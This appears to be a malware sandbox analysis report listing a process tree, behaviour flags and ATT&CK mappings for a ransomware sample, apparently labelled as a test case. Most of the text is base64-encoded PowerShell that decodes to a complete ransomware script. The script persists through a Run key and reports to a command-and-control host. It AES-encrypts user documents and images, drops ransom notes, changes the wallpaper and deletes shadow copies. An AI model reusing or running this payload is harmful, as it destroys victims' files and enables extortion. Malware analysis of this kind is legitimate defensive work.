BCAFEAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEASgBBAEIAZgBBAEMANABBAFQAZwBCAGgAQQBHADAAQQBaAFEAQQBwAEEARgAwAEEASQBBAEEAOQBBAEMAQQBBAEoAQQBCADAAQQBIAEkAQQBkAFEAQgBsAEEAQwBBAEEAZgBRAEEATgBBAEEAbwBBAEoAQQBCAGsAQQBHAGsAQQBjAGcAQgB6AEEAQwA0AEEAYQB3AEIAbABBAEgAawBBAGMAdwBBAGcAQQBIAHcAQQBJAEEAQQBsAEEAQwBBAEEAZQB3AEEAZwBBAEMASQBBAFcAUQBCAHYAQQBIAFUAQQBjAGcAQQBnAEEARwBZAEEAYQBRAEIAcwBBAEcAVQBBAGMAdwBBAGcAQQBHAEUAQQBjAGcAQgBsAEEAQwBBAEEAVABBAEIAUABBAEUATQBBAFMAdwBCAEYAQQBFAFEAQQBJAFEAQgBnAEEARwA0AEEAUQB3AEIAdgBBAEcANABBAGQAQQBCAGgAQQBHAE0AQQBkAEEAQQBnAEEARwAwAEEAWQBRAEIAcABBAEcAdwBBAFEAQQBCAGwAQQBIAFkAQQBhAFEAQgBzAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCADAAQQBHADgAQQBJAEEAQgB5AEEARwBVAEEAYwB3AEIAMABBAEcAOABBAGMAZwBCAGwAQQBDAEEAQQBlAFEAQgB2AEEASABVAEEAYwBnAEEAZwBBAEcAWQBBAGEAUQBCAHMAQQBHAFUAQQBjAHcAQQBoAEEAQwBJAEEASQBBAEIAOABBAEMAQQBBAFQAdwBCADEAQQBIAFEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEMAQQBBAEkAZwBBAGsAQQBGADgAQQBYAEEAQQBoAEEARgBJAEEAUgBRAEIAVABBAEYAUQBBAFQAdwBCAFMAQQBFAFUAQQBJAFEAQQB1AEEASABRAEEAZQBBAEIAMABBAEMASQBBAEkAQQBCADkAQQBBADAAQQBDAGcAQgBNAEEARwA4AEEAWgB3AEEAZwBBAEMASQBBAGMAdwBCAGwAQQBIAFEAQQBkAEEAQgBwAEEARwA0AEEAWgB3AEEAZwBBAEgAYwBBAFkAUQBCAHMAQQBHAHcAQQBjAEEAQgBoAEEASABBAEEAWgBRAEIAeQBBAEMASQBBAEQAUQBBAEsAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEARgBNAEEAZQBRAEIAegBBAEgAUQBBAFoAUQBCAHQAQQBDADQAQQBUAGcAQgBsAEEASABRAEEATABnAEIAWABBAEcAVQBBAFkAZwBCAEQAQQBHAHcAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAcABBAEMANABBAFIAQQBCAHYAQQBIAGMAQQBiAGcAQgBzAEEARwA4AEEAWQBRAEIAawBBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBLAEEAQQBpAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAE8AZwBBAHYAQQBDADgAQQBKAEEAQgB6AEEASABJAEEAZABnAEEAdgBBAEgAYwBBAFkAUQBCAHMAQQBHAHcAQQBjAEEAQgBoAEEASABBAEEAWgBRAEIAeQBBAEQAOABBAGEAUQBCAHcAQQBEADAAQQBKAEEAQgB0AEEASABrAEEAYQBRAEIAdwBBAEMASQBBAEwAQQBBAGcAQQBDAEkAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFQAUQBCAFEAQQBGAHcAQQBkAHcAQgBoAEEARwB3AEEAYgBBAEIAdwBBAEgAQQBBAEwAZwBCAHcAQQBHADQAQQBaAHcAQQBpAEEAQwBrAEEARABRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBTAFEAQgAwAEEARwBVAEEAYgBRAEIAUQBBAEgASQBBAGIAdwBCAHcAQQBHAFUAQQBjAGcAQgAwAEEASABrAEEASQBBAEEAdABBAEgAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBnAEEAUwB3AEIARABBAEYAVQBBAE8AZwBCAGMAQQBFAE0AQQBiAHcAQgB1AEEASABRAEEAYwBnAEIAdgBBAEcAdwBBAEkAQQBCAFEAQQBHAEUAQQBiAGcAQgBsAEEARwB3AEEAWABBAEIARQBBAEcAVQBBAGMAdwBCAHIAQQBIAFEAQQBiAHcAQgB3AEEARgB3AEEASgB3AEEAZwBBAEMAMABBAGIAZwBCAGgAQQBHADAAQQBaAFEAQQBnAEEASABjAEEAWQBRAEIAcwBBAEcAdwBBAGMAQQBCAGgAQQBIAEEAQQBaAFEAQgB5AEEAQwBBAEEATABRAEIAMgBBAEcARQBBAGIAQQBCADEAQQBHAFUAQQBJAEEAQQBpAEEAQwBRAEEAWgBRAEIAdQBBAEgAWQBBAE8AZwBCAFUAQQBFADAAQQBVAEEAQgBjAEEASABjAEEAWQBRAEIAcwBBAEcAdwBBAGMAQQBCAHcAQQBDADQAQQBjAEEAQgB1AEEARwBjAEEASQBnAEEATgBBAEEAbwBBAFoAdwBCAGoAQQBHAGsAQQBJAEEAQgBTAEEARwBVAEEAWgB3AEIAcABBAEgATQBBAGQAQQBCAHkAQQBIAGsAQQBPAGcAQQA2AEEARQBnAEEAUwB3AEIARgBBAEYAawBBAFgAdwBCAFYAQQBGAE0AQQBSAFEAQgBTAEEARgBNAEEASQBBAEIAOABBAEMAQQBBAFUAdwBCAGwAQQBHAHcAQQBaAFEAQgBqAEEASABRAEEASQBBAEIAQQBBAEgAcwBBAGIAZwBCAGgAQQBHADAAQQBaAFEAQQA5AEEAQwBJAEEAVQB3AEIASgBBAEUAUQBBAEkAZwBBADcAQQBHAFUAQQBlAEEAQgB3AEEASABJAEEAWgBRAEIAegBBAEgATQBBAGEAUQBCAHYAQQBHADQAQQBQAFEAQgA3AEEAQwBRAEEAWAB3AEEAdQBBAEYAQQBBAFUAdwBCAEQAQQBHAGcAQQBhAFEAQgBzAEEARwBRAEEAVABnAEIAaABBAEcAMABBAFoAUQBCADkAQQBIADAAQQBJAEEAQgA4AEEAQwBBAEEASgBRAEEAZwBBAEgAcwBBAEkAQQBBAE4AQQBBAG8AQQBVAHcAQgBsAEEASABRAEEATABRAEIASgBBAEgAUQBBAFoAUQBCAHQAQQBGAEEAQQBjAGcAQgB2AEEASABBAEEAWgBRAEIAeQBBAEgAUQBBAGUAUQBBAGcAQQBDADAAQQBjAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMASQBBAFUAZwBCAGwAQQBHAGMAQQBhAFEAQgB6AEEASABRAEEAYwBnAEIANQBBAEQAbwBBAE8AZwBCAEkAQQBFAHMAQQBSAFEAQgBaAEEARgA4AEEAVgBRAEIAVABBAEUAVQBBAFUAZwBCAFQAQQBGAHcAQQBKAEEAQQBvAEEAQwBRAEEAWAB3AEEAdQBBAEYATQBBAFMAUQBCAEUAQQBDAGsAQQBYAEEAQgBEAEEARwA4AEEAYgBnAEIAMABBAEgASQBBAGIAdwBCAHMAQQBDAEEAQQBVAEEAQgBoAEEARwA0AEEAWgBRAEIAcwBBAEYAdwBBAFIAQQBCAGwAQQBIAE0AQQBhAHcAQgAwAEEARwA4AEEAYwBBAEIAYwBBAEMASQBBAEkAQQBBAHQAQQBHADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEIAMwBBAEcARQBBAGIAQQBCAHMAQQBIAEEAQQBZAFEAQgB3AEEARwBVAEEAYwBnAEEAZwBBAEMAMABBAGQAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASQBnAEEAawBBAEcAVQBBAGIAZwBCADIAQQBEAG8AQQBWAEEAQgBOAEEARgBBAEEAWABBAEIAMwBBAEcARQBBAGIAQQBCAHMAQQBIAEEAQQBjAEEAQQB1AEEASABBAEEAYgBnAEIAbgBBAEMASQBBAEQAUQBBAEsAQQBIADAAQQBEAFEAQQBLAEEARgBJAEEAVgBRAEIATwBBAEUAUQBBAFQAQQBCAE0AQQBEAE0AQQBNAGcAQQB1AEEARQBVAEEAVwBBAEIARgBBAEMAQQBBAGQAUQBCAHoAQQBHAFUAQQBjAGcAQQB6AEEARABJAEEATABnAEIAawBBAEcAdwBBAGIAQQBBAHMAQQBGAFUAQQBjAEEAQgBrAEEARwBFAEEAZABBAEIAbABBAEYAQQBBAFoAUQBCAHkAQQBGAFUAQQBjAHcAQgBsAEEASABJAEEAVQB3AEIANQBBAEgATQBBAGQAQQBCAGwAQQBHADAAQQBVAEEAQgBoAEEASABJAEEAWQBRAEIAdABBAEcAVQBBAGQAQQBCAGwAQQBIAEkAQQBjAHcAQQBOAEEAQQBvAEEAUgB3AEIAbABBAEgAUQBBAEwAUQBCAFgAQQBHADAAQQBhAFEAQgBQAEEARwBJAEEAYQBnAEIAbABBAEcATQBBAGQAQQBBAGcAQQBGAGMAQQBhAFEAQgB1AEEARABNAEEATQBnAEIAZgBBAEYATQBBAGEAQQBCAGgAQQBHAFEAQQBiAHcAQgAzAEEARwBNAEEAYgB3AEIAdwBBAEgAawBBAEkAQQBCADgAQQBDAEEAQQBSAGcAQgB2AEEASABJAEEAUgBRAEIAaABBAEcATQBBAGEAQQBBAHQAQQBFADgAQQBZAGcAQgBxAEEARwBVAEEAWQB3AEIAMABBAEMAQQBBAGUAdwBBAGsAQQBGADgAQQBMAGcAQgBFAEEARwBVAEEAYgBBAEIAbABBAEgAUQBBAFoAUQBBAG8AQQBDAGsAQQBPAHcAQgA5AEEAQQAwAEEAQwBnAEIAcABBAEcAWQBBAEkAQQBBAG8AQQBDAFEAQQBQAHcAQQBwAEEAQwBBAEEAZQB3AEEAZwBBAEUAdwBBAGIAdwBCAG4AQQBDAEEAQQBJAGcAQgBqAEEARwB3AEEAWgBRAEIAaABBAEgASQBBAFoAUQBCAGsAQQBDAEEAQQBkAGcAQgB6AEEASABNAEEASQBnAEEAZwBBAEgAMABBAEQAUQBBAEsAQQBHAFUAQQBiAEEAQgB6AEEARwBVAEEASQBBAEIANwBBAEMAQQBBAFQAQQBCAHYAQQBHAGMAQQBJAEEAQQBpAEEARwBNAEEAYgBBAEIAbABBAEcARQBBAGMAZwBBAGcAQQBIAFkAQQBjAHcAQgB6AEEAQwBBAEEAWgBnAEIAaABBAEcAawBBAGIAQQBCAGwAQQBHAFEAQQBJAEEAQQB0AEEAQwBBAEEAYwBBAEIAbABBAEgASQBBAGIAUQBCAHAAQQBIAE0AQQBjAHcAQgBwAEEARwA4AEEAYgBnAEIAegBBAEQAOABBAEkAZwBBAGcAQQBIADAAQQBEAFEAQQBLAEEARQB3AEEAYgB3AEIAbgBBAEMAQQBBAEkAZwBCAGsAQQBHADgAQQBiAGcAQgBsAEEAQwBJAEEAIgANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwBjADIALgB5AGEAcgB0AHQAZABuAC4AZABlADoAMQA1ADMAMwAyAC8AbABvAGcAIgAgAC0AQgBvAGQAeQAgAEAAewBpAHAAPQAoAEcAZQB0AC0ATgBlAHQASQBQAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAEkAUAB2ADQARABlAGYAYQB1AGwAdABHAGEAdABlAHcAYQB5ACAALQBuAGUAIAAkAG4AdQBsAGwAIAAtAGEAbgBkACAAJABfAC4ATgBlAHQAQQBkAGEAcAB0AGUAcgAuAFMAdABhAHQAdQBzACAALQBuAGUAIAAiAEQAaQBzAGMAbwBuAG4AZQBjAHQAZQBkACIAfQApAC4ASQBQAHYANABBAGQAZAByAGUAcwBzAC4ASQBQAEEAZABkAHIAZQBzAHMAOwAgAG0AZQBzAHMAYQBnAGUAPQAiAFQAZQBzAHQAQwBhAHMAZQAgAFQAQwAwADQALwAwADUAIABpAG4AcwB0AGEAbABsAGkAbgBnACIAfQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBJAG4AdgBvAGsAZQAtAFcAbQBpAE0AZQB0AGgAbwBkACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAQwByAGUAYQB0AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBlAG4AYwAgACQAcABsACIADQAKACQAaQBkACAAPQAgACIAYQA4ADAAOAAyADUAOABkAC0AZABlAGIAMAAtADQAZgBhADIALQBiADQAOQBmAC0AMgA5AGEAMwBmADgAMAAyADQAMQBjADAAIgANAAoATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlACAALQBOAGEAbQBlACAAJABpAGQAIAAtAEUAQQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAAkAGkAZAAiACAALQBOAGEAbQBlACAAIgBDAG8AZABlACIAIAAtAFYAYQBsAHUAZQAgACQAcABsACAALQBGAG8AcgBjAGUAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwANAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAaQBkACAALQBWAGEAbAB1AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AYwBvAG0AbQBhAG4AZAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAATQBpAG4AaQBtAGkAegBlAGQAIAAtAGUAbgBjACAAJAAoACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAYQA4ADAAOAAyADUAOABkAC0AZABlAGIAMAAtADQAZgBhADIALQBiADQAOQBmAC0AMgA5AGEAMwBmADgAMAAyADQAMQBjADAAIgApAC4AQwBvAGQAZQApACcAIAAtAEYAbwByAGMAZQAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnAA0ACgANAAoA
  2⤵
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden -enc JABzAHIAdgAgAD0AIAAiAGMAMgAuAHkAYQByAHQAdABkAG4ALgBkAGUAOgAxADUAMwAzADIAIgANAAoAJAB0AGMAIAA9ACAAIgBUAGUAcwB0AEMAYQBzAGUAIABUAEMAMAA0AC8AMAA1ACIADQAKACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIADQAKACQAbQB5AGkAcAAgAD0AIAAoAEcAZQB0AC0ATgBlAHQASQBQAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7AA0ACgAkAF8ALgBJAFAAdgA0AEQAZQBmAGEAdQBsAHQARwBhAHQAZQB3AGEAeQAgAC0AbgBlACAAJABuAHUAbABsACAALQBhAG4AZAAgACQAXwAuAE4AZQB0AEEAZABhAHAAdABlAHIALgBTAHQAYQB0AHUAcwAgAC0AbgBlACAAIgBEAGkAcwBjAG8AbgBuAGUAYwB0AGUAZAAiAA0ACgB9ACkALgBJAFAAdgA0AEEAZABkAHIAZQBzAHMALgBJAFAAQQBkAGQAcgBlAHMAcwANAAoAZgB1AG4AYwB0AGkAbwBuACAATABvAGcAIAB7AA0ACgBwAGEAcgBhAG0AKAAkAG0AcwBnACkADQAKACgAaQB3AHIAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvACQAcwByAHYALwBsAG8AZwAiACAALQBCAG8AZAB5ACAAQAB7AGkAcAA9ACQAbQB5AGkAcAA7ACAAbQBlAHMAcwBhAGcAZQA9ACIAJAB0AGMAIAAkAG0AcwBnACIAfQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAIAANAAoAfQANAAoATABvAGcAIAAiAHIAdQBuAG4AaQBuAGcAIgANAAoAJABwAHUAYgAgAD0AIAAnADwAUgBTAEEASwBlAHkAVgBhAGwAdQBlAD4APABNAG8AZAB1AGwAdQBzAD4AeQA4AFkAMABMAG8ATAAvADEAKwBCAEsAVQB2AHcAdgB0AGUAbQBvAFUATwAyADIAagA5AFUAeABtAE0ARwBpAFkAYQB0AE4AaABjAEYAbwA2ADIANgBRAEwAaQB1AGUAegBJAEIAYgBhAFgASwBVAGkAUABHAE4AZQB3AEkAYgBDADAAdAA0AG0AZgBFAEIAZABRACsAcAB3AGUAcQA0AFMATABJAHIASABZAHYAUgA2AGMAUAAzAHYASwBLAEUADQAKAFoAMABwAFEAKwBGAFEAMAB1ADQASQBzAFIAUgBhADMAbwBpAHgAUAA0AE4ATgBqAG8AQwB1ADUAdQBnAFgAUgB0AGUARgBnAGQAeABOAE0AVQBVAHoAKwA2AE0AegBkAEIAVwA5AHgAaAA4ADMAZQA3AGkAcQBXAHAAZQBmAGsASwBiADAAMgBrAFAAWgBwAGgAKwBVAD0APAAvAE0AbwBkAHUAbAB1AHMAPgA8AEUAeABwAG8AbgBlAG4AdAA+AEEAUQBBAEIAPAAvAEUAeABwAG8AbgBlAG4AdAA+ADwALwBSAFMAQQBLAGUAeQBWAGEAbAB1AGUAPgAnAA0ACgAkAFIAUwBBACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBTAEEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIADQAKACQAUgBTAEEALgBGAHIAbwBtAFgAbQBsAFMAdAByAGkAbgBnACgAJABwAHUAYgApAA0ACgAkAGcAbABvAGIAYQBsADoAYwAgAD0AIAAwAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABFAG4AYwAgAHsADQAKAHAAYQByAGEAbQAgACgAIAAkAHAAIAApAA0ACgB0AHIAeQAgAHsADQAKACQAawBlAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcgByAGEAeQBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABbAGIAeQB0AGUAXQAsADMAMgApAA0ACgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AKQAuAE4AZQB4AHQAQgB5AHQAZQBzACgAJABrAGUAeQApAA0ACgAkAGsAZQB5AF8AZQBuAGMAIAA9ACAAJABSAFMAQQAuAEUAbgBjAHIAeQBwAHQAKAAkAGsAZQB5ACwAJAB0AHIAdQBlACkADQAKACQAQQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQADQAKACQAQQAuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwANAAoAJABBAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAUABLAEMAUwA3AA0ACgAkAEEALgBCAGwAbwBjAGsAUwBpAHoAZQAgAD0AIAAxADIAOAANAAoAJABBAC4ASwBlAHkAUwBpAHoAZQAgAD0AIAAyADUANgANAAoAJABBAC4ASwBlAHkAIAA9ACAAJABrAGUAeQANAAoAJABBAC4ASQBWACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgADEANgANAAoAJABiACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwACkADQAKACQAZQAgAD0AIAAkAGsAZQB5AF8AZQBuAGMAIAArACAAKAAkAEEALgBDAHIAZQBhAHQAZQBFAG4AYwByAHkAcAB0AG8AcgAoACkAKQAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkADQAKAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAHAALAAgACQAZQApAA0ACgBSAGUAbgBhAG0AZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AZQB3AE4AYQBtAGUAIAAiACQAcAAuAGMAcgBwAHQAIgANAAoAJABnAGwAbwBiAGEAbAA6AGMAKwArAA0ACgB9ACAAYwBhAHQAYwBoACAAewANAAoAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQANAAoAfQANAAoAfQANAAoAJABmAGkAbABlAHMAIAA9ACAARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIAAtAFEAdQBlAHIAeQAgACIAUwBFAEwARQBDAFQAIAAqACAARgBSAE8ATQAgAEMASQBNAF8ARABhAHQAYQBGAGkAbABlACAAVwBIAEUAUgBFACAATgBPAFQAIABOAGEAbQBlACAATABJAEsARQAgACcAYwA6AFwAXAB3AGkAbgBkAG8AdwBzAFwAXAAlACcAIABBAE4ARAANAAoAKABFAHgAdABlAG4AcwBpAG8AbgA9ACcAcABkAGYAJwAgAG8AcgAgAEUAeAB0AGUAbgBzAGkAbwBuAD0AJwBkAG8AYwB4ACcAIABvAHIAIABFAHgAdABlAG4AcwBpAG8AbgA9ACcAZABvAGMAJwAgAG8AcgAgAEUAeAB0AGUAbgBzAGkAbwBuAD0AJwB4AGwAcwB4ACcAIABvAHIAIABFAHgAdABlAG4AcwBpAG8AbgA9ACcAeABsAHMAJwAgAG8AcgAgAEUAeAB0AGUAbgBzAGkAbwBuAD0AJwBqAHAAZwAnACAAbwByACAARQB4AHQAZQBuAHMAaQBvAG4APQAnAGoAcABlAGcAJwAgAG8AcgAgAEUAeAB0AGUAbgBzAGkAbwBuAD0AJwBwAG4AZwAnACkAIgANAAoATABvAGcAIAAiAGYAbwB1AG4AZAAgACQAKAAkAGYAaQBsAGUAcwAuAEwAZQBuAGcAdABoACkAIABmAGkAbABlAHMAIAB0AG8AIABwAHIAbwBjAGUAcwBzACIADQAKACQAZgBpAGwAZQBzACAAfAAgACUAIAB7ACAARQBuAGMAKAAkAF8ALgBOAGEAbQBlACkAIAB9AA0ACgBMAG8AZwAgACIAcAByAG8AYwBlAHMAcwBlAGQAIAAkAGcAbABvAGIAYQBsADoAYwAgAGYAaQBsAGUAcwAiAA0ACgAkAGQAaQByAHMAIAA9ACAAQAB7AH0ADQAKACQAZgBpAGwAZQBzACAAfAAgACUAIAB7ACAAJABkAGkAcgBzAFsAKABTAHAAbABpAHQALQBQAGEAdABoACAAJABfAC4ATgBhAG0AZQApAF0AIAA9ACAAJAB0AHIAdQBlACAAfQANAAoAJABkAGkAcgBzAC4AawBlAHkAcwAgAHwAIAAlACAAewAgACIAWQBvAHUAcgAgAGYAaQBsAGUAcwAgAGEAcgBlACAATABPAEMASwBFAEQAIQBgAG4AQwBvAG4AdABhAGMAdAAgAG0AYQBpAGwAQABlAHYAaQBsAC4AYwBvAG0AIAB0AG8AIAByAGUAcwB0AG8AcgBlACAAeQBvAHUAcgAgAGYAaQBsAGUAcwAhACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAIgAkAF8AXAAhAFIARQBTAFQATwBSAEUAIQAuAHQAeAB0ACIAIAB9AA0ACgBMAG8AZwAgACIAcwBlAHQAdABpAG4AZwAgAHcAYQBsAGwAcABhAHAAZQByACIADQAKACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AJABzAHIAdgAvAHcAYQBsAGwAcABhAHAAZQByAD8AaQBwAD0AJABtAHkAaQBwACIALAAgACIAJABlAG4AdgA6AFQATQBQAFwAdwBhAGwAbABwAHAALgBwAG4AZwAiACkADQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAEMAbwBuAHQAcgBvAGwAIABQAGEAbgBlAGwAXABEAGUAcwBrAHQAbwBwAFwAJwAgAC0AbgBhAG0AZQAgAHcAYQBsAGwAcABhAHAAZQByACAALQB2AGEAbAB1AGUAIAAiACQAZQBuAHYAOgBUAE0AUABcAHcAYQBsAGwAcABwAC4AcABuAGcAIgANAAoAZwBjAGkAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAFMARQBSAFMAIAB8ACAAUwBlAGwAZQBjAHQAIABAAHsAbgBhAG0AZQA9ACIAUwBJAEQAIgA7AGUAeABwAHIAZQBzAHMAaQBvAG4APQB7ACQAXwAuAFAAUwBDAGgAaQBsAGQATgBhAG0AZQB9AH0AIAB8ACAAJQAgAHsAIAANAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACIAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBTAEUAUgBTAFwAJAAoACQAXwAuAFMASQBEACkAXABDAG8AbgB0AHIAbwBsACAAUABhAG4AZQBsAFwARABlAHMAawB0AG8AcABcACIAIAAtAG4AYQBtAGUAIAB3AGEAbABsAHAAYQBwAGUAcgAgAC0AdgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAVABNAFAAXAB3AGEAbABsAHAAcAAuAHAAbgBnACIADQAKAH0ADQAKAFIAVQBOAEQATABMADMAMgAuAEUAWABFACAAdQBzAGUAcgAzADIALgBkAGwAbAAsAFUAcABkAGEAdABlAFAAZQByAFUAcwBlAHIAUwB5AHMAdABlAG0AUABhAHIAYQBtAGUAdABlAHIAcwANAAoARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA0ACgBpAGYAIAAoACQAPwApACAAewAgAEwAbwBnACAAIgBjAGwAZQBhAHIAZQBkACAAdgBzAHMAIgAgAH0ADQAKAGUAbABzAGUAIAB7ACAATABvAGcAIAAiAGMAbABlAGEAcgAgAHYAcwBzACAAZgBhAGkAbABlAGQAIAAtACAAcABlAHIAbQBpAHMAcwBpAG8AbgBzAD8AIgAgAH0ADQAKAEwAbwBnACAAIgBkAG8AbgBlACIA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988
- C:\Windows\system32\rundll32.exe
  "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters
  2⤵
  PID:964

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
47aa9086381725fa5c49a9beffec3bc8

SHA1
